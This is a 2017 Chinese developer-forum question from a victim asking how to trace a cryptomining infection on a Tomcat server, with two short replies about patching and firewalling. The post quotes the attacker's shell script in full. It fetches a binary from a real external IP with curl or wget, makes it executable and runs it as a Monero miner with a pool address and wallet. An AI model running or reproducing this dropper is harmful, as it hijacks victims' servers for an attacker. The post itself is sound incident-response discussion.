开发者社区> 问答> 正文

挖矿病毒怎么排查

从6月开始,服务器断断续续被植入了挖矿病毒,然后我们追踪了一部分入口。发现服务器上会不定时执行一个curl命令,这个命令的父进程是java的tomcat容器
下面是那个shell脚本的内容,现在不知道对方是怎么进来的。






U=http://107.150.2.61/autox
AGENT_FILE='/tmp/autox'
if command -v curl > /dev/null 2>&1; then
  curl -s $U > $AGENT_FILE
elif command -v wget > /dev/null 2>&1; then
  wget -q $U -O - > $AGENT_FILE
else
  curl -s $U > $AGENT_FILE
fi
if [ ! -x $AGENT_FILE ]; then
  chmod +x $AGENT_FILE
fi
ps -ef|grep $AGENT_FILE|grep -v grep
if [ $? -ne 0 ]; then
  nohup $AGENT_FILE -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB -p x > /dev/null 2>&1 &
fi



展开
收起
iwuya_0 2017-07-06 16:02:40 9410 0
2 条回答
写回答
取消 提交回答
  • 回 1楼q276767466的帖子
    没有解决,现在准备升级tomcat,加了防火墙,把定时任务的文件加固,然后追踪这个病毒是通过tomcat进程来执行的。
    2017-07-07 17:04:16
    赞同 展开评论 打赏
  • Re挖矿病毒怎么排查
    大神是否已解决?
    小弟也遇到这个问题,求教解决办法Q276767466
    2017-07-07 10:52:43
    赞同 展开评论 打赏
问答排行榜
最热
最新

相关电子书

更多
代码未写,漏洞已出 立即下载
如何产生威胁情报-高级恶意攻击案例分析 立即下载
低代码开发师(初级)实战教程 立即下载